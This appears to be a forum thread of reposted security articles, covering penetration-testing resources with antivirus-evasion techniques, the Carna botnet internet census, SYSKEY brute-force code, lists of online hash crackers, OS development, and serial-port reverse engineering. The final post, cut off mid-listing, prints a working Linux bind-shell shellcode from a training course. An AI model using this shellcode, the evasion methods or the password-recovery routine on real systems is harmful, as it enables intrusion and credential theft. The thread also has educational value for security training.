orphan files, world writable files, sudoers configurations Insecure local and remote services Insecure schedule tasks Local and remote exploits Password guessing: medusa, hydra, bruter, and MetaSploit Password and hash dumping Password hash cracking: john the ripper, hashcat, masking Man in the Middle (MITM) Attacks For some of you, MITM attacks may be a new concept so here is brief description. If a workstation is communicating with a server, and you are routing traffic between them, then you are the MITM. It’s a great position to be in for monitoring and manipulating traffic. There are lots of ways to acquire a MITM position using a range of protocol attacks. To get you started, I’ve provided a list of 10 protocols and tools for attacking systems on a LAN. Address Resolution Protocol (ARP): Cain, ettercap, interceptor-ng, Subterfuge, easycreds NetBIOS Name Service (NBNS): MetaSploit and responder Link-local Multicast Name Resolution (LLMNR): MetaSploit and responder Pre-Execution Environment (PXE): MetaSploit Dynamic Trunking Protocol (DTP): Yersinia Spanning-Tree Protocol (STP): Yersinia, ettercap (lamia plugin) Hot Stand-by Router Protocol (HSRP): Yersinia Dynamic Host Configuration Protocol (DHCP): Interceptor, MetaSploit, manual setup Domain Name Services (DNS): MetaSploit, ettercap, dsniff, zodiac, ADMIdPack VLAN Tunneling Protocol (VTP): Yersinia, voiphopper, or modprobe+ifconfig Anti-Virus Evasion Anti-virus evasion is often a requirement during penetration testing. I personally break down AV evasion approaches into the four buckets below. I provided a list of keywords for each category to get your searches started. I’m also planning to release a few blogs down the line that will provide more options and actual examples. Bypass Weak AV Configurations Uninstall anti-virus, disable services, terminate processes, disabled via the GUI, create an exception policy for all .exe files, or execute from external media. Source Code Manipulation Remove comments, randomize function and variable names, encode or encrypt content, delay execution of malicious code, use alternative functions, or insert superfluous functions that change execution flow. Binary Manipulation Bind with white listed applications, pack or compress, modify strings, modify resources, modify imports table, modify assembly to do things mentioned in source code manipulation. Common packers: upx, iexpress, and mpress. Process Manipulation Inject malicious code or DLLs into local or remote process. Native languages can do it directly or through a managed code framework like .net. Powershell is a popular example that the MetaSploit team (amongst others) has been using a lot lately. Also, process manipulation is commonly done with python code that is converted to a portable executable. Sursa: Resources for Aspiring Penetration Testers | NetSPI Blog

Zic astia multe, doar ca in alt topic, pe acelasi subiect.

Port scanning /0 using insecure embedded devices From: "internet census" <internetcensus2012 () mail com> Date: Sun, 17 Mar 2013 19:54:03 -0400 --------------------- Internet Census 2012 --------------------- -------- Port scanning /0 using insecure embedded devices -------- ------------------------- Carna Botnet ------------------------- While playing around with the Nmap Scripting Engine we discovered an amazing number of open embedded devices on the Internet. Many of them are based on Linux and allow login to standard BusyBox with empty or default credentials. From March to December 2012 we used ~420 Thousand insecure embedded devices as a distributed port scanner to scan all IPv4 addresses. These scans include service probes for the most common ports, ICMP ping, reverse DNS and SYN scans. We analyzed some of the data to get an estimation of the IP address usage. All data gathered during our research is released into the public domain for further study. The full 9 TB dataset has been compressed to 565GB using ZPAQ and is available via BitTorrent. The dataset contains: - 52 billion ICMP ping probes - 10.5 billion reverse DNS records - 180 billion service probe records - 2.8 billion sync scan records for 660 million IPs with 71 billion ports tested - 80 million TCP/IP fingerprints - 75 million IP ID sequence records - 68 million traceroute records This project is, to our knowledge, the largest and most comprehensive IPv4 census ever. With a growing number of IPv6 hosts on the Internet, 2012 may have been the last time a census like this was possible. A full documention, including statistics and images, can be found on the project page. We hope other researchers will find the data we have collected useful and that this publication will help raise some awareness that, while everybody is talking about high class exploits and cyberwar, four simple stupid default telnet passwords can give you access to hundreds of thousands of consumer as well as tens of thousands of industrial devices all over the world. No devices were harmed during this experiment and our botnet has now ceased its activity. Project Page: Internet Census 2012 http://internetcensus2012.github.com/InternetCensus2012/ Internet Census 2012 Torrent MAGNET LINK: magnet:?xt=urn:btih:7e138693170629fa7835d52798be18ab2fb847fe&dn=InternetCensus2012&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80% 2fannounce&tr=udp%3a%2f%2ftracker.ccc.de%3a80%2fannounce&tr=udp%3a%2f%2ftracker.publicbt.com%3a80%2fannounce Sursa: Full Disclosure: Port scanning /0 using insecure embedded devices

[h=1]Password Algorithms: Windows System Key (SYSKEY)[/h] I stumbled upon some forum posts related to System Key recently and read something about 1 of the authentication modes available to Administrators that made me wonder if true or not. Just to note, there are 3 modes. Generated by passphrase Stored in registry Stored on removable storage device 2 is enabled by default, but you can change this with the syskey.exe utility. The claim was that if you forgot the passphrase or “startup password” there’s no reliable method of recovery. The “only way” to get back into the system is to restore a backup if one is available or disable completely using something like ntpasswd In most cases, either way is probably sufficient enough, but there are situations where you would need to know the original passphrase and don’t have a backup available or perhaps you can’t even use a backup which could erase some critical information required. There are a number of ways to recover the passphrase but I’ll just suggest one for now. Found this short video which shows someone enabling the startup password One of the the comments is “BOSS? HOW WE HACK SYSKEY!!!” [h=2]History of SYSKEY[/h] SYSKEY was Microsoft’s response to pwdump and L0phtCrack. It was provided as an optional security enhancement with Windows NT SP3 and enabled by default since the release of Windows 2000. The purpose of this feature was to prevent pwdump working without modifications. Open source offline decryption tools didn’t surface until the release of samdump2 by Nicola Cuomo. What follows is a short timeline of events related to SYSKEY. [TABLE] [TR] [TD]March 1997[/TD] [TD]Samba developer Jeremy Allison publishes pwdump which enables Administrators to dump LM and NTLM hashes stored in the SAM database.[/TD] [/TR] [TR] [TD]April 1997[/TD] [TD]L0pht publishes L0phtcrack which allows Administrators to audit password hashes. It had been in development since the release of pwdump.[/TD] [/TR] [TR] [TD]May 1997[/TD] [TD]Microsoft publishes Service Pack 3 for Windows NT which added SYSKEY as an optional feature to prevent pwdump working properly.[/TD] [/TR] [TR] [TD]December 1999[/TD] [TD]Todd Sabin documents flaw with SYSKEY. Anyone with access to the SAM database can reveal password hashes without the System key.[/TD] [/TR] [TR] [TD]April 2000[/TD] [TD]Todd Sabin releases pwdump2 which dumps password hashes with the obfuscation removed. This also dumps hashes from a domain controller.[/TD] [/TR] [TR] [TD]February 2004[/TD] [TD]Nicola Cuomo documents SYSKEY, Releases Samdump2 which enables offline decryption of password hashes stored in SAM database.[/TD] [/TR] [/TABLE] [h=2]Password Generation[/h] When the system boots and auth mode 1 is enabled, windows will display a dialog box waiting for you to enter the password. The following text is displayed on an XP system. “This computer is configured to require a password in order to start up. Please enter the Startup Password below.” Blank passwords are acceptable so whether you enter something or not, it gets processed with MD5 and authenticated once you hit OK. #define MAX_SYSKEY_PWD 260 void pwd2key(wchar_t pwd[], uint8_t syskey[]) { MD5_CTX ctx; size_t pwd_len = wcslen(pwd); pwd_len = (pwd_len > MAX_SYSKEY_PWD) ? MAX_SYSKEY_PWD : pwd_len; MD5_Init(&ctx); MD5_Update(&ctx, pwd, pwd_len); MD5_Final(syskey, &ctx); } Enter the wrong password 3 times and you’ll receive the following error. “System error: Lsass.exe” “When trying to update a password the return status indicates that the value provided as the current password is not correct.” This message appears because the LSA database key fails to decrypt but I wanted to know how exactly this password was authenticated. Between XP and Vista, the LSA database got a major upgrade so you may see something else on post-XP systems. If you were to attempt recovery through the LSA database, it would not only be much slower, it’s more complicated and because there’s a simpler way, I’m not going to cover it. [h=2]SAM Database[/h] The SAM database is stored in %SystemRoot%\System32\config\SAM which as you probably know contains local user and group information, including encrypted NTLM/LM hashes. Windows reads the value of F under SAM\Domains\Account and using the System key, decrypts the Sam key. The structure of the F value isn’t documented but I’ve put together what I *think* is close enough to the original based on some MSDN documentation and analyzing code in SAMSRV.DLL which is where the decryption occurs. #define SYSTEM_KEY_LEN 16 #define QWERTY "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%" #define DIGITS "0123456789012345678901234567890123456789" #define SAM_KEY_LEN 16 #define SAM_SALT_LEN 16 #define SAM_CHECKSUM_LEN 16 typedef struct _SAM_KEY_DATA { uint32_t Revision; uint32_t Length; uint8_t Salt[SAM_SALT_LEN]; uint8_t Key[SAM_KEY_LEN]; uint8_t CheckSum[SAM_CHECKSUM_LEN]; uint32_t Reserved[2]; } SAM_KEY_DATA, *PSAM_KEY_DATA; typedef enum _DOMAIN_SERVER_ENABLE_STATE { DomainServerEnabled = 1, DomainServerDisabled } DOMAIN_SERVER_ENABLE_STATE, *PDOMAIN_SERVER_ENABLE_STATE; typedef enum _DOMAIN_SERVER_ROLE { DomainServerRoleBackup = 2, DomainServerRolePrimary = 3 } DOMAIN_SERVER_ROLE, *PDOMAIN_SERVER_ROLE; typedef struct _OLD_LARGE_INTEGER { unsigned long LowPart; long HighPart; } OLD_LARGE_INTEGER, *POLD_LARGE_INTEGER; #pragma pack(4) typedef struct _DOMAIN_ACCOUNT_F { uint32_t Revision; uint32_t unknown1; OLD_LARGE_INTEGER CreationTime; OLD_LARGE_INTEGER DomainModifiedCount; OLD_LARGE_INTEGER MaxPasswordAge; OLD_LARGE_INTEGER MinPasswordAge; OLD_LARGE_INTEGER ForceLogoff; OLD_LARGE_INTEGER LockoutDuration; OLD_LARGE_INTEGER LockoutObservationWindow; OLD_LARGE_INTEGER ModifiedCountAtLastPromotion; uint32_t NextRid; uint32_t PasswordProperties; uint16_t MinPasswordLength; uint16_t PasswordHistoryLength; uint16_t LockoutThreshold; uint16_t unknown2; DOMAIN_SERVER_ENABLE_STATE ServerState; DOMAIN_SERVER_ROLE ServerRole; uint8_t UasCompatibilityRequired; uint32_t unknown3[2]; SAM_KEY_DATA keys[2]; uint32_t unknown4; } DOMAIN_ACCOUNT_F, *PDOMAIN_ACCOUNT_F; #pragma pack() NTSTATUS DecryptSamKey(PSAM_KEY_DATA key_data, uint8_t syskey[]) { MD5_CTX ctx; RC4_KEY key; uint8_t dgst[MD5_DIGEST_LEN]; // create key with salt and decrypt data MD5_Init(&ctx); MD5_Update(&ctx, key_data->Salt, SAM_SALT_LEN); MD5_Update(&ctx, QWERTY, strlen(QWERTY) + 1); MD5_Update(&ctx, syskey, SYSTEM_KEY_LEN); MD5_Update(&ctx, DIGITS, strlen(DIGITS) + 1); MD5_Final(dgst, &ctx); RC4_set_key(&key, MD5_DIGEST_LEN, dgst); RC4(&key, SAM_CHECKSUM_LEN + SAM_KEY_LEN, key_data->Key, key_data->Key); // verify decryption was successful by generating checksum MD5_Init(&ctx); MD5_Update(&ctx, key_data->Key, SAM_KEY_LEN); MD5_Update(&ctx, DIGITS, strlen(DIGITS) + 1); MD5_Update(&ctx, key_data->Key, SAM_KEY_LEN); MD5_Update(&ctx, QWERTY, strlen(QWERTY) + 1); MD5_Final(dgst, &ctx); // compare with checksum and return status if (memcmp(dgst, key_data->CheckSum, SAM_CHECKSUM_LEN) == 0) { return STATUS_SUCCESS; } return STATUS_WRONG_PASSWORD; } NOTE: The strings didn’t format well for the blog but if you plan on using, let me know. As you can see above, the Sam key is decrypted using System key and then a checksum is generated and compared with that stored in SAM_KEY_DATA If they match, authentication succeeded, return STATUS_SUCCESS else STATUS_WRONG_PASSWORD That’s pretty much how you can brute force the System Key when auth mode 1 is selected. [h=2]Recovery[/h] Assuming you can read the F value from SAM hive, recovery is straight forward enough with the right libraries/code. Following is just some pseudo code to demonstrate flow of recovery using dictionary attack. sam = openfile("offline_system\Windows\config\SAM"); data = readreg(sam, "SAM\Domains\Account", "F") words = openfile("dictionary.txt") while (readfile(words, pwd)) { pwd2key(pwd, syskey) if (DecryptSamKey(data->keys[0], syskey) == STATUS_SUCCESS) { print "Found password: " + pwd break; } } closefile(words) closefile(sam) LSA and NTDS algorithms call a hash function 1000 times during creation of the encryption/decryption key while SAM algorithm doesn’t use any. It’s not a vulnerability but could be useful to know some day. Sursa: Password Algorithms: Windows System Key (SYSKEY) | Insecurety Research

[h=1]Simple Os Example[/h] Posted 18 May 2007 - 05:11 PM Simple OS Example - by Napalm and Xavier Want to make your own Operating System? After reading Topic #24940 I thought it would be a good idea to share some knowledge i've gained about operating system development. So Xavier and I decided to write a simple operating system to help people get started in OS development. This project is aimed for operating system development under windows, but should be compatible with Linux users. First a small explanation of how an IBM compatible PC boots. The first stop is the BIOS, which loads the bootable medium as per your BIOS configuration i.e floppy, cdrom, hdd, etc. In our example we have chosen the simplest of these, a floppy. The BIOS copies and loads the boot sector of the media and this in turn passes control to the boot-loader (GRUB, LILO, NTLDR). You can create your own boot-loader, but at such a low level its not for the faint hearted. There are plenty of good boot-loader's already created, so we have decided to go with one of our favourites, GRUB. The boot-loader as per it's configuration will load the kernel of our OS. With GRUB this is done with menu.lst which is pre-configured in our base.img file. GRUB moves the system into protected mode and sets up the A20 gate (Google for details). GRUB has a boot specification which is helpful to us, Multi-boot. We have applied the multi-boot scheme in our boot.asm, this is also the entry point of the operating system (this is where our program first gains control). In boot.asm we declare an uninitialised 8KB data block for our kernel stack, and then we further pass control onto our C code. One of the more difficult aspects of OS development is that you have no library functions to build on (this means no strlen, strcpy or even memset). So without any functions to output, input or even process information we start at a road-block (kind of like being hurled into the ocean with no life raft ). After all that has been said we do have direct access to the hardware. So outputting to the screen should not be too difficult. The BIOS sets up a mapped area of physical memory to the VGA adapter installed in the machine. By default, this area starts at 0xB8000. So with the simple line of C we could output a character to the screen. The upper 8bits of 0x0F00 is the char attributes of background black(0x0) and foreground (0xF). *(unsigned short *)0xB8000 = 0x0F00 | 'A'; In 'screen.c' you will find basic functions to output text to the screen. We also have some I/O ports provided to us to control the VGA adapter. The two ports we are interested in are the index and data registers for the CRT interface. These will allow us to control the old style blinking console cursor. You will see these registers in use in the updatecursor(), hidecursor() and showcursor() functions inside 'screen.c'. For more information regarding the VGA interface see the following link: http://www.osdever.n...VGA/vga/vga.htm It might not seem like it, but the most important part of OS Dev'ing is the Development Environment itself. Having a good set of utilities to develop and test with is one of the most important parts. So below is a list of requirements and where to get them. This should help even the most n00bish person get started. Our environment is setup for use under windows (2k or above) but any competent Linux user should be able to make the minor alterations necessary to build this project under Linux. The assembler we are using in the project is my favourite NASM and a port of the GNU GCC compiler. These are provided under a simulated Linux environment called DJGPP. All links are provided to get all the requirements listed below. List of Requirements: Windows (duh!) DJGPP (Provided) NASM (Included in DJGPP package) VMWare Player (Optional) VMware Player: Run Windows 8, Chrome OS on a Virtual PC Brain (IBM compatible only!) Setting up DJGPP: Extract http://www.blackcore...urces/djgpp.zip to C:\DJGPP. Alternatively if you feel ultra confident (or bored) you can manually acquire each individual package yourself, from a mirror located on DJGPP . The packages you require are: bnu217b.zip, djdev203.zip, gcc344b.zip, mak380b.zip and a compatible version of NASM can be found here: http://downloads.sou...98.39-djgpp.zip Building The Kernel: Now that DJGPP has been setup you can extract the attached zip file to any location you please. Once extracted you'll find several batch files. Execute 'build.bat' to compile the kernel binary (kernel.bin). Now that you have a kernel you will need to make this bootable. This can be done via 'mkfloppy.bat' or 'mkcdrom.bat' to make a bootable floppy or cdrom image respectively. At any point after you have built the kernel you can execute 'test.bat' to launch the kernel in VMWare. Below you will find a screenshot that has been captured from VMWare. We hope this will encourage more programmers to delve into the wonderful (and frustrating) world of OS development. Linux users are encouraged to post instructions on how to modify the project to build under a Linux environment. Any and all comments are welcome, Napalm and Xavier Bootnotes I deleted the whole project by accident during a send to Xavier and I had to rewrite the entire thing. A note about batch files, although they are extremely useful they are also a massive pain the the ass. We spent about an hour getting 'mkcdrom.bat' script working, so be thankful. Update - 1st June 2008 I've updated the attached archive to include compiled images for floppy and cd-rom. I've also updated it use to the new KernelCopy application mentioned further on in this topic. I've hacked the download count to match the previous download count before the update. Update - 16th June 2008 I was notified that my last update broke the base image file included. I was an idiot and defragged the image so the upload would compress smaller. I forgot that when grub installs itself it tells stage1 which sector stage2 is located in. Therefore when the defrag moved stage2 it broke the boot loader and the image stopped working. I've updated the attachment with a completely new grub bootable base image file (it compresses even smaller now to 65Kb). Update - 27th November 2008 I've made some minor alterations to help the confused people get their heads around the source. If you want me to write a completely updated version with more support please post a reply and say so. I've updated the attachment. [h=4]Attached Files[/h] simpleos.zip 647.44K 3175 downloads Sursa: Simple Os Example - rohitab.com - Forums

[h=3]Online Hash Crackers[/h] [TABLE] [TR] [TH]MD5[/TH] [/TR] [TR] [TH]Cracker [/TH] [TH]Hashes[/TH] [/TR] [TR] [TD]Tobtu[/TD] [TD]50,529,455,839[/TD] [/TR] [TR] [TD]TMTO[/TD] [TD]36,436,233,567[/TD] [/TR] [TR] [TD]MD5Decrypter(uk)[/TD] [TD]8,700,000,000[/TD] [/TR] [TR] [TD]OnlineHashCrack[/TD] [TD]5,211,644,250[/TD] [/TR] [TR] [TD]AuthSecu[/TD] [TD]500,000,000[/TD] [/TR] [TR] [TD]Gat3way[/TD] [TD]458,000,000[/TD] [/TR] [TR] [TD]MD5this[/TD] [TD]400,000,000[/TD] [/TR] [TR] [TD]NetMD5crack[/TD] [TD]171,392,210[/TD] [/TR] [TR] [TD]Kalkulators[/TD] [TD]100,000,000[/TD] [/TR] [TR] [TD]Rednoize[/TD] [TD]76,834,449[/TD] [/TR] [TR] [TD]Gromweb[/TD] [TD]45,543,530[/TD] [/TR] [TR] [TD]hash-cracker.com[/TD] [TD]40,000,000[/TD] [/TR] [TR] [TD]Crackfoo -NNC[/TD] [TD]38,227,555[/TD] [/TR] [TR] [TD]MD5Rainbow[/TD] [TD]33,517,066[/TD] [/TR] [TR] [TD]Digitalsun[/TD] [TD]31,000,000[/TD] [/TR] [TR] [TD]Hashcrack[/TD] [TD]30,654,899[/TD] [/TR] [TR] [TD]Sans[/TD] [TD]20,264,963[/TD] [/TR] [TR] [TD]Crackfor.me[/TD] [TD]16,173,854[/TD] [/TR] [TR] [TD]MD5-lookup[/TD] [TD]8,796,772[/TD] [/TR] [TR] [TD]MD5decrypter[/TD] [TD]8,103,123[/TD] [/TR] [TR] [TD]MD5-db[/TD] [TD]5,500,000[/TD] [/TR] [TR] [TD]MD5-decrypter[/TD] [TD]3,400,000[/TD] [/TR] [TR] [TD]HashCracking.ru[/TD] [TD]3,585,150[/TD] [/TR] [TR] [TD]Shalla[/TD] [TD]2,218,319[/TD] [/TR] [TR] [TD]Hash-Database[/TD] [TD]1,635,062[/TD] [/TR] [TR] [TD]MD5decryption[/TD] [TD]1,300,000[/TD] [/TR] [TR] [TD]agilobable.pl[/TD] [TD]1,131,017[/TD] [/TR] [TR] [TD]Drasen[/TD] [TD]568,064[/TD] [/TR] [TR] [TD]MD5finder[/TD] [TD]429,477[/TD] [/TR] [TR] [TD]MD5pass[/TD] [TD]327,497[/TD] [/TR] [TR] [TD]Bokehman[/TD] [TD]230,000[/TD] [/TR] [TR] [TD]Shell-Storm[/TD] [TD]154,994[/TD] [/TR] [TR] [TD]Xanadrel[/TD] [TD]104,209[/TD] [/TR] [TR] [TD]Joomlaaa[/TD] [TD]23,469[/TD] [/TR] [TR] [TD]Appspot[/TD] [TD]Multi[/TD] [/TR] [TR] [TD]Noisette[/TD] [TD]Multi[/TD] [/TR] [TR] [TD]MD5crack[/TD] [TD]Multi[/TD] [/TR] [TR] [TD]Kinginfet[/TD] [TD]Multi[/TD] [/TR] [TR] [TD]Benramsey[/TD] [TD]Multi[/TD] [/TR] [TR] [TD]VHCTeam[/TD] [TD]?[/TD] [/TR] [TR] [TD]Hack-Shop[/TD] [TD]?[/TD] [/TR] [TR] [TD]Longgie[/TD] [TD]?[/TD] [/TR] [TR] [TD]RAH-Labs[/TD] [TD]?[/TD] [/TR] [TR] [TD]rusuh.us[/TD] [TD]?[/TD] [/TR] [TR] [TD]Wordd[/TD] [TD]?[/TD] [/TR] [TR] [TD]Anqel[/TD] [TD]?[/TD] [/TR] [TR] [TD]CMD5[/TD] [TD]?[/TD] [/TR] [TR] [TD]web-security-services[/TD] [TD]?[/TD] [/TR] [TR] [TD]MD5online[/TD] [TD]?[/TD] [/TR] [TR] [TD]MD5.my-addr[/TD] [TD]?[/TD] [/TR] [TR] [TD]C0llision[/TD] [TD]?[/TD] [/TR] [TR] [TD]MD5hood[/TD] [TD]?[/TD] [/TR] [TR] [TD]Schwett[/TD] [TD]?[/TD] [/TR] [TR] [TD]TheKaine[/TD] [TD]?[/TD] [/TR] [TR] [TD]Fox21[/TD] [TD]?[/TD] [/TR] [TR] [TD]Generuj[/TD] [TD]?[/TD] [/TR] [/TABLE] [TABLE] [TR] [TH]NTLM[/TH] [/TR] [TR] [TH]Cracker [/TH] [TH]Hashes[/TH] [/TR] [TR] [TD]MD5decrypter(uk)[/TD] [TD]8,700,000,000[/TD] [/TR] [TR] [TD]OnlineHashCrack[/TD] [TD]5,211,644,250[/TD] [/TR] [TR] [TD]hash-cracker.com[/TD] [TD]40,000,000[/TD] [/TR] [TR] [TD]HashCrack[/TD] [TD]30,654,909[/TD] [/TR] [TR] [TD]Fox21[/TD] [TD]?[/TD] [/TR] [TR] [TD]LMCrack[/TD] [TD]?[/TD] [/TR] [TR] [TD]CMD5[/TD] [TD]?[/TD] [/TR] [/TABLE] [TABLE] [TR] [TH]LM[/TH] [/TR] [TR] [TH]Cracker [/TH] [TH]Hashes[/TH] [/TR] [TR] [TD]OnlineHashCrack[/TD] [TD]5,211,644,250[/TD] [/TR] [TR] [TD]HashCrack[/TD] [TD]30,654,911[/TD] [/TR] [TR] [TD]NiceNameCrew[/TD] [TD]?[/TD] [/TR] [TR] [TD]C0llision[/TD] [TD]?[/TD] [/TR] [TR] [TD]Fox21[/TD] [TD]?[/TD] [/TR] [/TABLE] [TABLE] [TR] [TH]SHA1[/TH] [/TR] [TR] [TH]Cracker [/TH] [TH]Hashes[/TH] [/TR] [TR] [TD]MD5Decrypter(uk)[/TD] [TD]8,700,000,000[/TD] [/TR] [TR] [TD]Rednoize[/TD] [TD]76,838,852[/TD] [/TR] [TR] [TD]hash-cracker.com[/TD] [TD]40,000,000[/TD] [/TR] [TR] [TD]Sans[/TD] [TD]20,264,963[/TD] [/TR] [TR] [TD]SHA1-Lookup[/TD] [TD]18,949,380[/TD] [/TR] [TR] [TD]HashCracking.ru[/TD] [TD]3,585,150[/TD] [/TR] [TR] [TD]Hash-Database[/TD] [TD]1,635,065[/TD] [/TR] [TR] [TD]CMD5[/TD] [TD]?[/TD] [/TR] [TR] [TD]StringFunction[/TD] [TD]?[/TD] [/TR] [TR] [TD]Web-Security-Services[/TD] [TD]?[/TD] [/TR] [/TABLE] [TABLE] [TR] [TH]SHA256-512[/TH] [/TR] [TR] [TH]Cracker [/TH] [TH]Hashes[/TH] [/TR] [TR] [TD]Hash-Database[/TD] [TD]1,635,067[/TD] [/TR] [TR] [TD]Shalla[/TD] [TD]1,143,472[/TD] [/TR] [/TABLE] [TABLE] [TR] [TH]MySQL[/TH] [/TR] [TR] [TH]Cracker [/TH] [TH]Hashes[/TH] [/TR] [TR] [TD]OnlineHashCrack[/TD] [TD]5,211,644,250[/TD] [/TR] [TR] [TD]Hashcrack[/TD] [TD]30,654,899[/TD] [/TR] [TR] [TD]HashCracking.ru[/TD] [TD]3,585,150[/TD] [/TR] [TR] [TD]CMD5[/TD] [TD]?[/TD] [/TR] [/TABLE] Sursa: Password Cracker | MD5 Cracker | Wordlist Download: Online Hash Crackers

In mare, e destul de ok filmuletul, dar e si amuzant, au fost multe faze care m-au facut sa rad. Bine, pe alocuri e cam tras de par si se exagereaza, iar uneori concluziile jurnalistilor sunt de cacat, dar per total face lumina in cazul "Hackersville" si face diferenta dintre hot si hacker. Eu sper doar ca acest documentar sa fie vazut de cat mai multi jurnalisti, daca jurnalistii vor intelege "fenomenul", toata lumea il va intelege. Legat de subiecte, nimeni nu a facut nimic special. NASA zice ca intr-un an a fost "sparta" de cel putin 13 ori si pe zone-h gasiti 11 deface-uri in 2012: - NASA says it was hacked 13 times last year | Reuters - http://zone-h.org/archive/filter=1/fulltext=1/domain=nasa.gov Cu alte cuvinte, cei care "au spart NASA", nu au facut nimic special si nu sunt singurii care au facut asta. Despre Ebay stim cu totii cum mergeau lucrurile si cum faptul ca poti fura o masina nu te face inginer auto, asa nici faptul ca poti fura datele unor ratati nu te face hacker. Tinkode a fost mediatizat pentru ca la momentul respectiv se facea tam-tam pentru orice site spart, in prezent, din moment ce se sparg site-uri mari in fiecare zi, nu mai are niciun farmec si spargerea site-urilor nu mai are aceeasi mediatizare ca inainte. Asadar va sfatuiesc sa lasati prostiile si sa incercati sa ajungeti vedete pe alte cai pentru ca da, puteti ajunge vedete facand acelasi lucru, dar puteti avea si problemele sale facand acelasi lucru. Bine, a fost cam trasa de par fraza cu "cel mai cautat hacker de pe planeta"... In mare e ok, il puteti recomanda ratatilor care va intreaba cum se sparge o parola de mess. Ar fi trebuit sa acopere in 20 de secunde si "Daca stii sa instalezi un Windows si un Adobe Reader nu inseamna ca esti hacker" deoarece sunt multi astfel de cocalari care se supraapreciaza.

[h=2]Trend Micro Warns of Attacks Against ICS/SCADA Systems[/h]March 17th, 2013 Mourad Ben Lakhoua At Blackhat Europe 2013 in Amsterdam security researcher at Trend Micro revealed a collaborative honeypot project with Scada security team that was running fake ICS/Scada devices used in many critical infrastructure power and water plants. The honeypot were optimized and promoted on different search engines such as google to be found directly and trick attacker about the reality of these servers. Servers were named Scada-1,Scada-2, and so on. According to Scada security researcher Kyle Wilhoit they also made the honeypot seeded on devices that were part of HD Moore’s Shodan Project.4. This to attract motivated and targeted attackers to easily find the servers and the first attack was detected after only 18 hours. You can have Trend Micro report by following this link: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-whos-really-attacking-your-ics-equipment.pdf Sursa: Trend Micro Warns of Attacks Against ICS/SCADA Systems | SecTechno

[h=1]Reverse Engineering Serial Ports[/h]By Craig | November 1, 2012 | Embedded Systems, Hardware, Tutorials Given the name of this blog and the number of requests that I’ve had, I think it’s high time we discussed serial ports; specifically, serial ports in embedded systems. My goal here is to describe the techniques that I’ve found effective in identifying and reverse engineering embedded serial ports through the use of definitive testing and educated guesses, and without the need for expensive equipment. [h=1]Introduction[/h] Serial ports are extremely useful to embedded developers, who commonly use them for: Accessing the boot loader Observing boot and debug messages Interacting with the system via a shell Needless to say, this functionality is also useful to hackers, so finding a serial port on an embedded device can be very advantageous. As a case study, we’ll be examining the PCB of a Westell 9100EM FiOS router for possible serial ports: Westell 9100EM PCB Now, these aren’t your dad’s RS-232 serial ports that we’re looking for; these are Universal Asynchronous Receiver Transmitters (UARTs), commonly found in embedded devices. Although protocol compatible, RS-232 and UART are not voltage compatible (from here on out I will use the terms “UART” and “serial port” interchangeably). UARTs most commonly operate at 3.3 volts, but can also be found operating at other standard voltages (5, 1.8, etc). Unfortunately there aren’t any industry standardized UART pin outs, and manufacturers don’t often go around advertising or documenting their debug interfaces, so we’ll need to do a bit of work in order to interface with these serial ports. Specifically, we need to reverse engineer both the hardware interface and the software protocol settings. Let’s start with the hardware interface first. For this, you’ll need a multimeter and a pair of eyeballs (or even one will do just fine). Yes, oscilloscopes and logic analyzers are useful and sometimes necessary, but 99% of the time a trusty multimeter and a bit of knowledge is all you need. [h=1]Identifying Serial Headers[/h] The first step is to try to identify potential candidates for serial port headers. Most serial port headers have at a minimum four pins: Vcc Ground Transmit Receive Typically you’ll want to look for a single row of 4-6 pins, although this is not a hard and fast rule and they can come in any pin configuration the manufacturer has decided on. On our 9100EM PCB we find two possible candidates, labeled P1402 and P1404: Possible serial port headers Sometimes you won’t have a nicely broken out set of pins like this, and you’ll have to examine test points on the board; usually starting with test points closest to the SoC is a good idea. Here is an example of a serial port exposed via test points on a different board, the WL530G: Serial port test points on a WL530G In either case the process of pin identification is the same, but usually takes longer if there is no header since there will likely be more than 4 test points on the board that you will need to examine. At this point either P1402 or P1404 could be serial port headers. Or they could both be serial port headers. Or neither could be a serial port header. So we’ll examine the pins on each header individually to try to gain some insight. Articol complet: http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/

[h=1]Shell bind TCP shellcode[/h] Hello everybody, Last week I have finished the SecurityTube Linux Assembly Expert (SLAE) course that requires to accomplish 7 assignments in order to get certificated. Thus, I would like to publish shell_bind_TCP shellcode I have written in Intel IA-32 Assembly. The shellcode run test and the analysis are included in this post. [h=3]Source code[/h] I wrote two versions of the shell_bind_tcp shellcode. First, a very detailed one, shellcode size 141 bytes, you can get it here: shell_bind_tcp.nasm And a second one is just an extra attempt to reduce the shellcode size down to 108 bytes, here: shell_bind_tcp_smaller.nasm [h=3]Generating shellcode[/h] $ ./compile_all.sh shell_bind_tcp 43775 [I] Using custom port: 43775 [+] Assembling shell_bind_tcp.nasm with NASM ... [+] Linking shell_bind_tcp.o ... [+] Generating shellcode with objdump ... [+] Checking shellcode for NULLs ... [+] Shellcode size is 141 bytes "\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xaa\xff" [+] Generating shellcode.c file with the shell_bind_tcp shellcode ... [+] Compiling shellcode.c with GCC ... [+] All done! You can run the shellcode now: $ ./shellcode [h=3]Checking generated shellcode.c[/h] arno $ cat shellcode.c #include <stdio.h> #include <string.h> # The shell_bind_TCP shellcode itself unsigned char code[] = \ 